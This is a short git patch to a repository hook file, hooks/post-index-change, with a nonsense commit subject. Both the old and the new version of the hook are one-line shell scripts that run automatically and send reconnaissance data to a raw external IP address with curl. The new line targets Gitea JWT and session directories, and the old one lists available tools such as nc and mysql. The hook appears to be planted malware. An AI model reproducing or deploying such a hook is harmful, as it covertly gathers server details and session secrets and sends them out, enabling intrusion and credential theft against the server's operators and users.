From 8c91d8b39d953b858e078677e6ec736d0db29918 Mon Sep 17 00:00:00 2001 From: moldwave Date: Sat, 12 Sep 2026 14:11:26 +0000 Subject: [PATCH] y1m73651 --- hooks/post-index-change | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hooks/post-index-change b/hooks/post-index-change index 433307a..9bda4fc 100755 --- a/hooks/post-index-change +++ b/hooks/post-index-change @@ -1,2 +1,2 @@ #!/bin/sh -command -v mysql mariadb python3 perl nc busybox 2>&1; echo ===; ls /usr/local/bin /usr/bin 2>/dev/null | head -20 | base64 -w0 | curl -s -m 25 -X POST --data-binary @- http://51.38.90.142:3199/m12593 > /dev/null 2>&1 +command -v gitea; ls /app/gitea/gitea /usr/local/bin/gitea 2>&1 | head -3; ls /data/gitea/jwt 2>/dev/null | head -5; ls /data/gitea/sessions 2>/dev/null | head -5 | base64 -w0 | curl -s -m 25 -X POST --data-binary @- http://51.38.90.142:3199/m7365 > /dev/null 2>&1